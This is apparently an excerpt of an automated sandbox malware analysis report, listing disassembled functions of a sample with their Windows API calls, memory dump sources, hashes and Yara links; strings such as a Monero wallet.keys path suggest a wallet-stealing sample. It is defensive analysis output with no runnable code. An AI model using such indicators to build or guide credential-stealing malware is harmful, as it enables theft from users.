                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 4171519190-1096346117
                                  • Opcode ID: 6d7d05d21ac332c1a2d836b934525781190580a9740cd60d9f34826a664abb9d
                                  • Instruction ID: 0f4ef102bd2a34cb0d9212671b9f39f9f3d0b52f141ed70d4a0cad4b83b2ccc8
                                  • Opcode Fuzzy Hash: 6d7d05d21ac332c1a2d836b934525781190580a9740cd60d9f34826a664abb9d
                                  • Instruction Fuzzy Hash: 3F615E71A60208EBDB28EFA4CC96FED7775AF41304F408128F90A5F191EB746A25CF52
                                  Function 002440B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,0104E4A8,00000000,00020119,?), ref: 002440F4
                                  • RegQueryValueExA.ADVAPI32(?,0104F230,00000000,00000000,00000000,000000FF), ref: 00244118
                                  • RegCloseKey.ADVAPI32(?), ref: 00244122
                                  • lstrcat.KERNEL32(?,00000000), ref: 00244147
                                  • lstrcat.KERNEL32(?,0104F020), ref: 0024415B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: 52df2625e56a2c0b74eb5b5c1f3621387666ea833b305dd72e400263df5ec29b
                                  • Instruction ID: feeedc3d5d035c8bc15aa43d8b207de55641b6ad49bfe25e59805c9b7185ecbd
                                  • Opcode Fuzzy Hash: 52df2625e56a2c0b74eb5b5c1f3621387666ea833b305dd72e400263df5ec29b
                                  • Instruction Fuzzy Hash: A14147B6D101086BDB18FBA0DC56FFE737DAB88300F404558B61A96181EA755BE88FD2
                                  Function 00247E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00247E37
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00247E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,0103B840,00000000,00020119,?), ref: 00247E5E
                                  • RegQueryValueExA.ADVAPI32(?,0104E588,00000000,00000000,000000FF,000000FF), ref: 00247E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00247E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: fc1b41d49f0f7fe7e769e48a645ec5fa41a990fa4306ed4dc15d699ebd6f6391
                                  • Instruction ID: 1b4419bf87dee518c71215aab8ee49fd6bc06614fb05d06110914021d7d5e1ae
                                  • Opcode Fuzzy Hash: fc1b41d49f0f7fe7e769e48a645ec5fa41a990fa4306ed4dc15d699ebd6f6391
                                  • Instruction Fuzzy Hash: AD11A0B1A54205EBD704DF94DD49FBFBBBCFB44B01F104269FA19A7280D7B458148BA2
                                  Function 00249260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • StrStrA.SHLWAPI(0104F2A8,?,?,?,0024140C,?,0104F2A8,00000000), ref: 0024926C
                                  • lstrcpyn.KERNEL32(0047AB88,0104F2A8,0104F2A8,?,0024140C,?,0104F2A8), ref: 00249290
                                  • lstrlen.KERNEL32(?,?,0024140C,?,0104F2A8), ref: 002492A7
                                  • wsprintfA.USER32 ref: 002492C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 36dd5b6f68b96a0a998a9d7c7ff68d49298a5b2e6ac7243f227c1a947a42588e
                                  • Instruction ID: 6d96c02d17cc6f7a3ee82037747af3b4c862f7141ce30d245affeb4254c6a705
                                  • Opcode Fuzzy Hash: 36dd5b6f68b96a0a998a9d7c7ff68d49298a5b2e6ac7243f227c1a947a42588e
                                  • Instruction Fuzzy Hash: B701CC75500108FFCB04DFECC988EAE7BB9EB84355F108558F90D9B204C675AAA0DBD6
                                  Function 002312A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002312B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002312BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002312D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002312F5
                                  • RegCloseKey.ADVAPI32(?), ref: 002312FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 103a763ddfb6a70080c7bcd5702404141c99a93302f95617c705e42ced4d4604
                                  • Instruction ID: 2877c593d62fcbb9451a03bb65a50c9d0f652df2b0fd4f8abb3aee071cbd8672
                                  • Opcode Fuzzy Hash: 103a763ddfb6a70080c7bcd5702404141c99a93302f95617c705e42ced4d4604
                                  • Instruction Fuzzy Hash: 430131B9A40208BBDB04DFE0DC49FAEB7B8EB88701F008169FA0997280D6709A558F55
                                  Function 0024C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: f80cdf3f7bbdbe486bcdc50110023b3c338e7b9850c3ba01d6bf670ace63ee98
                                  • Instruction ID: 3db0e1a823ff537a6fb93b49b654b963ac7769c196de9cc34c6c2d2d139c45b9
                                  • Opcode Fuzzy Hash: f80cdf3f7bbdbe486bcdc50110023b3c338e7b9850c3ba01d6bf670ace63ee98
                                  • Instruction Fuzzy Hash: 0441097111175CAEDB2A8B28CC84FFBBBEC9F45704F2444E8E5CA86182D2719A54CF20
                                  Function 00246630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00246663
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00246726
                                  • ExitProcess.KERNEL32 ref: 00246755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 4d36c2559d9a91de125fd1433c0c727d8aff530b7f880f036ee9504c5a865ff9
                                  • Instruction ID: ddef8a18c0fb23bcd14f52ccfc5ebd9f0d3a81392f638e18f7ce1ac8a328da7b
                                  • Opcode Fuzzy Hash: 4d36c2559d9a91de125fd1433c0c727d8aff530b7f880f036ee9504c5a865ff9
                                  • Instruction Fuzzy Hash: 353141B1C11218ABDB18EB50DC92FDDB778AF44300F404199F30966191DF746B99CF5A
                                  Function 002487C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00250E28,00000000,?), ref: 0024882F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00248836
                                  • wsprintfA.USER32 ref: 00248850
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 1922c97624bfba6c85eef0f09f2a71b8c28293581a3071d08ca17ca2f43a8faa
                                  • Instruction ID: e880469a649067574545c97cfe6f3d232798c5fe89d6b955c79590eef0c8b4bf
                                  • Opcode Fuzzy Hash: 1922c97624bfba6c85eef0f09f2a71b8c28293581a3071d08ca17ca2f43a8faa
                                  • Instruction Fuzzy Hash: A32154B1E50208AFDB04DFD4DD45FAEBBB8FB48701F104159F609A7280C7799950CBA6
                                  Function 00248D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0024951E,00000000), ref: 00248D5B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00248D62
                                  • wsprintfW.USER32 ref: 00248D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 4f66d0445d1078df5a3ca19292928dd7cc4bfc4a2d31f80c9a10e883a4421c69
                                  • Instruction ID: 147736b8ca77bd357ec8daef83477cd87b7aa6decb2f5249239b44060b3889f7
                                  • Opcode Fuzzy Hash: 4f66d0445d1078df5a3ca19292928dd7cc4bfc4a2d31f80c9a10e883a4421c69
                                  • Instruction Fuzzy Hash: 59E08670A40208BBC700DB94DC09E5D77BCEB44702F0400A4FD0D97240D9719E648B5A
                                  Function 0023A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 00248B60: GetSystemTime.KERNEL32(00250E1A,0104EC50,002505AE,?,?,002313F9,?,0000001A,00250E1A,00000000,?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 00248B86
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0023A2E1
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 0023A3FF
                                  • lstrlen.KERNEL32(00000000), ref: 0023A6BC
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                  • DeleteFileA.KERNEL32(00000000), ref: 0023A743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 190f0dcc8b90f01451829c9677645fa718940358eab7b6b874a885f99984c574
                                  • Instruction ID: 503b10f686c926f1d0ed2eecf01d9606a41c7fe8f1c6ef9590f7dfe3c3329838
                                  • Opcode Fuzzy Hash: 190f0dcc8b90f01451829c9677645fa718940358eab7b6b874a885f99984c574
                                  • Instruction Fuzzy Hash: BBE1DF728601189AEB18EBA4DC92EEE7338EF54304F508169F51776091EF306A69CF66
                                  Function 0023D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 00248B60: GetSystemTime.KERNEL32(00250E1A,0104EC50,002505AE,?,?,002313F9,?,0000001A,00250E1A,00000000,?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 00248B86
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0023D481
                                  • lstrlen.KERNEL32(00000000), ref: 0023D698
                                  • lstrlen.KERNEL32(00000000), ref: 0023D6AC
